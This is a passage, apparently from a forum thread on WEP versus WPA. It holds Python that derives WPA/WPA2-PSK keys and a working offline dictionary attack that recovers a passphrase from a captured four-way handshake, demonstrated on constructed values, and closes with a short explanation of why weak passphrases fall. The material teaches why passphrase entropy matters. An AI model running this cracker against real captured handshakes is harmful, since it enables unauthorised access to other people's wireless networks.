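MIC_OFFSET = 81      # MIC field inside an EAPOL-Key frame (802.1X hdr 4 + descriptor fields 77)


def wpa_psk_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    """802.11i PRF-n: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0, 1, ..."""
    out = b""
    for i in range(-(-nbytes // 20)):
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:nbytes]


def kck_from_pmk(pmk, aa, spa, anonce, snonce) -> bytes:
    """First 16 bytes of the PTK (the Key Confirmation Key) that keys the handshake MICs."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf(pmk, b"Pairwise key expansion", data, 64)[:16]


def eapol_mic(kck: bytes, eapol: bytes, wpa2: bool = True) -> bytes:
    """MIC over the EAPOL-Key frame with its MIC field zeroed: HMAC-SHA1 (WPA2) or HMAC-MD5 (WPA)."""
    zeroed = eapol[:MIC_OFFSET] + bytes(16) + eapol[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1 if wpa2 else hashlib.md5).digest()[:16]


def crack_psk(ssid, aa, spa, anonce, snonce, eapol_msg2, wordlist, wpa2=True):
    """What a handshake-based dictionary attack does: one PBKDF2 per candidate."""
    target = eapol_msg2[MIC_OFFSET:MIC_OFFSET + 16]
    for cand in wordlist:
        if not 8 <= len(cand) <= 63:               # not a valid WPA passphrase
            continue
        kck = kck_from_pmk(wpa_psk_pmk(cand, ssid), aa, spa, anonce, snonce)
        if hmac.compare_digest(eapol_mic(kck, eapol_msg2, wpa2), target):
            return cand
    return None


# Constructed handshake parameters (what a passive sniffer sees in messages 1 and 2).
AA = bytes.fromhex("000f66112233")      # AP (authenticator)
SPA = bytes.fromhex("004096abcdef")     # station (supplicant)
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
SSID = "coffeeshop_wifi"


def build_msg2(passphrase: str, wpa2: bool = True) -> bytes:
    """A constructed EAPOL-Key message 2 as the legitimate station would send it:
    SNonce at offset 17, MIC at offset 81, over a 121-byte frame."""
    body = bytearray(121)
    body[0:4] = b"\x02\x03\x00\x75"                      # 802.1X v2, type EAPOL-Key, length 117
    body[4] = 0x02 if wpa2 else 0xFE                     # descriptor type: RSN or legacy WPA
    body[17:49] = SNONCE
    kck = kck_from_pmk(wpa_psk_pmk(passphrase, SSID), AA, SPA, ANONCE, SNONCE)
    body[MIC_OFFSET:MIC_OFFSET + 16] = eapol_mic(kck, bytes(body), wpa2)
    return bytes(body)


WORDLIST = ["password", "letmein1", "latte2003", "Tr0ub4dor&3", "coffeeshop_wifi"]   # constructed
WEAK = "latte2003"                                     # short and guessable: falls to the list
STRONG = "vHhU3!sdKqq9?Pmz1&Rc_x7Lw"                    # 25 random characters: never in a list

if __name__ == "__main__":
    print("weak   ->", crack_psk(SSID, AA, SPA, ANONCE, SNONCE, build_msg2(WEAK), WORDLIST))
    print("strong ->", crack_psk(SSID, AA, SPA, ANONCE, SNONCE, build_msg2(STRONG), WORDLIST))
```

Two things follow from the code. The SSID is the PBKDF2 salt, so a precomputed table only helps against networks that share a default SSID; and the 4096 iterations are the only cost the attacker pays per guess, which is why a passphrase drawn from a word list falls quickly while one with real entropy does not, exactly the line the Moskowitz paper drew.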

v3xproof

@afspc.af.mil

Re: WEP vs WPA

Whoops, meant to post this in reply to »Out of Thin Air
Sorry